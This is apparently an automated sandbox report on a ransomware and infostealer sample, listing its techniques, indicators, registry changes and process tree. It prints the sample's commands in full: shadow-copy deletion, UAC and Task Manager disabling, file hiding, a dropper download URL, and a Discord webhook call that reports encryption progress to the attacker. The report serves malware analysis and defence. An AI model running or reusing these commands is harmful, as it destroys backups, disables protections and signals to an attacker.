9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635

Analysis

max time kernel
92s
max time network
117s
platform
windows10_x64
resource
win10v20201028
submitted
18-02-2021 08:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RenderGraphics.bin.exe
Size

1006KB
MD5

46a1769d81d7dcda455f0f05b9b29648
SHA1

4d56dffea9d04ee8ed174f1b3328675daf4be7b1
SHA256

9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
SHA512

8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193

Score

10^/10

evasion ransomware spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

14 2572 powershell.exe
16 2572 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
14	2572	powershell.exe
16	2572	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exe

pid	process
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4324	aescrypt.exe
2284	aescrypt.exe
5092	aescrypt.exe
3920	aescrypt.exe
3288	aescrypt.exe
4288	aescrypt.exe
3148	aescrypt.exe
4072	aescrypt.exe
5008	aescrypt.exe
4528	aescrypt.exe
4584	aescrypt.exe
4572	aescrypt.exe
4576	aescrypt.exe
1524	aescrypt.exe
1288	aescrypt.exe
1772	aescrypt.exe
1816	aescrypt.exe
2384	aescrypt.exe
2604	aescrypt.exe
2596	aescrypt.exe
4708	aescrypt.exe
4460	aescrypt.exe
4628	aescrypt.exe
764	aescrypt.exe
3960	aescrypt.exe
3084	aescrypt.exe
4520	aescrypt.exe
4484	aescrypt.exe
4632	aescrypt.exe
604	aescrypt.exe
436	aescrypt.exe
632	aescrypt.exe
1268	aescrypt.exe
1676	aescrypt.exe
2160	aescrypt.exe
2304	aescrypt.exe
2500	aescrypt.exe
2856	aescrypt.exe
4716	aescrypt.exe
2588	aescrypt.exe
4412	aescrypt.exe
1364	aescrypt.exe
804	aescrypt.exe
2296	aescrypt.exe
4684	aescrypt.exe
3664	aescrypt.exe
4608	aescrypt.exe
3116	aescrypt.exe
2220	aescrypt.exe
2212	aescrypt.exe
4796	aescrypt.exe
272	aescrypt.exe
3568	aescrypt.exe
280	aescrypt.exe
4268	aescrypt.exe
3432	aescrypt.exe
4476	aescrypt.exe
4076	aescrypt.exe
3488	aescrypt.exe
4464	aescrypt.exe
4620	aescrypt.exe
3196	aescrypt.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2568 schtasks.exe
204 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1960 vssadmin.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1548 taskkill.exe
2152 taskkill.exe
1644 taskkill.exe
1820 taskkill.exe

pid	process
2568	schtasks.exe
204	schtasks.exe

pid	process
1960	vssadmin.exe

pid	process
1548	taskkill.exe
2152	taskkill.exe
1644	taskkill.exe
1820	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Mouse	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Mouse\SwapMouseButtons = "1"	reg.exe

Modifies registry class 36 IoCs

Processes:

NOTEPAD.EXEcmd.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	NOTEPAD.EXE

Opens file in notepad (likely ransom note) 3 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXENOTEPAD.EXE

pid process

4720 NOTEPAD.EXE
3236 NOTEPAD.EXE
4248 NOTEPAD.EXE

pid	process
4720	NOTEPAD.EXE
3236	NOTEPAD.EXE
4248	NOTEPAD.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
992	powershell.exe
992	powershell.exe
992	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
1380	powershell.exe
1380	powershell.exe
1380	powershell.exe
4340	powershell.exe
4340	powershell.exe
4340	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
2096	powershell.exe
2096	powershell.exe
2096	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
4544	powershell.exe
4544	powershell.exe
4544	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

NOTEPAD.EXEOpenWith.exe

pid process

4720 NOTEPAD.EXE
2628 OpenWith.exe

pid	process
4720	NOTEPAD.EXE
2628	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

WMIC.exevssvc.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeBackupPrivilege	4164	vssvc.exe
Token: SeRestorePrivilege	4164	vssvc.exe
Token: SeAuditPrivilege	4164	vssvc.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exe

pid	process
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe

Suspicious use of SendNotifyMessage 6 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exe

pid	process
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

NOTEPAD.EXEOpenWith.exe

pid process

4720 NOTEPAD.EXE
2628 OpenWith.exe

pid	process
4720	NOTEPAD.EXE
2628	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

RenderGraphics.bin.execmd.exe

description	pid	process	target process
PID 4764 wrote to memory of 3580	4764	RenderGraphics.bin.exe	cmd.exe
PID 4764 wrote to memory of 3580	4764	RenderGraphics.bin.exe	cmd.exe
PID 3580 wrote to memory of 4256	3580	cmd.exe	WMIC.exe
PID 3580 wrote to memory of 4256	3580	cmd.exe	WMIC.exe
PID 3580 wrote to memory of 1960	3580	cmd.exe	vssadmin.exe
PID 3580 wrote to memory of 1960	3580	cmd.exe	vssadmin.exe
PID 3580 wrote to memory of 3432	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 3432	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4428	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4428	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4060	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4060	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4436	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4436	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 3452	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 3452	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 1856	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 1856	3580	cmd.exe	reg.exe
PID 3580 wrote to memory of 4504	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4504	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4520	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4520	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4524	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4524	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4556	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 4556	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 4556	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 992	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 992	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 1644	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 1644	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 1820	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 1820	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 1548	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 1548	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 2152	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 2152	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 2568	3580	cmd.exe	schtasks.exe
PID 3580 wrote to memory of 2568	3580	cmd.exe	schtasks.exe
PID 3580 wrote to memory of 2572	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 2572	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 204	3580	cmd.exe	schtasks.exe
PID 3580 wrote to memory of 204	3580	cmd.exe	schtasks.exe
PID 3580 wrote to memory of 4452	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 4452	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 4452	3580	cmd.exe	DiscordSendWebhook.exe
PID 3580 wrote to memory of 1380	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 1380	3580	cmd.exe	powershell.exe
PID 3580 wrote to memory of 4336	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4336	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 4356	3580	cmd.exe	cmd.exe
PID 3580 wrote to memory of 4356	3580	cmd.exe	cmd.exe
PID 3580 wrote to memory of 4324	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 4324	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 4324	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 3088	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 3088	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 2284	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 2284	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 2284	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 2212	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 2212	3580	cmd.exe	attrib.exe
PID 3580 wrote to memory of 5092	3580	cmd.exe	aescrypt.exe
PID 3580 wrote to memory of 5092	3580	cmd.exe	aescrypt.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
224	attrib.exe
4352	attrib.exe
2692	attrib.exe
1096	attrib.exe
532	attrib.exe
4724	attrib.exe
3032	attrib.exe
4372	attrib.exe
4536	attrib.exe
1504	attrib.exe
292	attrib.exe
4504	attrib.exe
3088	attrib.exe
4260	attrib.exe
4844	attrib.exe
4356	attrib.exe
4544	attrib.exe
228	attrib.exe
4252	attrib.exe
1876	attrib.exe
1644	attrib.exe
3372	attrib.exe
4560	attrib.exe
2692	attrib.exe
4732	attrib.exe
200	attrib.exe
2564	attrib.exe
2156	attrib.exe
4928	attrib.exe
3924	attrib.exe
4848	attrib.exe
4544	attrib.exe
1184	attrib.exe
3928	attrib.exe
3340	attrib.exe
1280	attrib.exe
968	attrib.exe
2348	attrib.exe
4068	attrib.exe
2496	attrib.exe
4700	attrib.exe
528	attrib.exe
3268	attrib.exe
4596	attrib.exe
4900	attrib.exe
532	attrib.exe
1960	attrib.exe
1692	attrib.exe
2368	attrib.exe
4372	attrib.exe
1180	attrib.exe
4620	attrib.exe
4524	attrib.exe
4712	attrib.exe
4296	attrib.exe
1520	attrib.exe
1820	attrib.exe
4744	attrib.exe
4524	attrib.exe
3916	attrib.exe
1136	attrib.exe
4756	attrib.exe
4448	attrib.exe
1404	attrib.exe

C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2754.tmp\2755.tmp\2756.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1960

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
3⤵
PID:3432

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
3⤵
PID:4428

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
3⤵
PID:4060

C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
3⤵
PID:4436

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
3⤵
PID:3452

C:\Windows\system32\reg.exe
REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
3⤵
- Modifies Control Panel
PID:1856

C:\Windows\system32\attrib.exe
attrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
3⤵
PID:4504

C:\Windows\system32\attrib.exe
attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe"
3⤵
PID:4520

C:\Windows\system32\attrib.exe
attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe"
3⤵
- Views/modifies file attributes
PID:4524

C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
